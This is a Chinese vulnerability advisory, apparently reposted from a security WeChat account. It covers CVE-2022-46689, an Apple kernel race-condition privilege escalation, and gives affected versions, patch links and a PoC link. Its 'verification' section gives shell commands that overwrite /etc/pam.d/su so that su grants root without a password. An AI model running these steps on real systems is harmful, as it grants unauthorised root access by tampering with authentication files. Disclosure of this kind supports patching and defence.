CVE-2022-46689|Apple 多个产品权限提升漏洞

admin 2022年12月22日11:07:17评论120 views字数 1023阅读3分24秒阅读模式

CVE-2022-46689|Apple 多个产品权限提升漏洞

点击蓝字 关注我们

CVE-2022-46689|Apple 多个产品权限提升漏洞

CVE-2022-46689|Apple 多个产品权限提升漏洞

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

Apple 多个产品内核存在条件竞争漏洞,成功利用此漏洞的攻击者可使用内核权限执行任意代码。

风险等级

高危

影响版本

macOS 13.0.1 / 12.6.1(或更低版本)

tvOS < 16.2

iOS / iPadOS < 16.2

iOS / iPadOS < 15.7.2

watchOS < 9.2

漏洞验证

以macOS为例

clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su
CVE-2022-46689|Apple 多个产品权限提升漏洞

「poc」

https://github.com/zhuowei/MacDirtyCowDemo

修复方案

目前官方已发布可更新版本,建议受影响用户升级至补丁版本

https://support.apple.com/en-us/HT213531

https://support.apple.com/en-us/HT213532

https://support.apple.com/en-us/HT213530

https://support.apple.com/en-us/HT213535

https://support.apple.com/en-us/HT213536

https://support.apple.com/en-us/HT213533

https://support.apple.com/en-us/HT213534

另外关注公众号后台回复“框架RCE”可获取常见框架漏洞利用工具后台回复“pentest”获取常用渗透测试工具集。回复“apk11获取apk测试工具集。

关注公众号

下面就是团队的公众号啦,更新的文章都会在第一时间推送在公众号

63篇原创内容

支持作者

CVE-2022-46689|Apple 多个产品权限提升漏洞
于传播、利用本公众号CKCsec安全研究院所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,CKCsec安全研究院及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

原文始发于微信公众号(CKCsec安全研究院):CVE-2022-46689|Apple 多个产品权限提升漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月22日11:07:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-46689|Apple 多个产品权限提升漏洞https://cn-sec.com/archives/1477668.html

发表评论

匿名网友 填写信息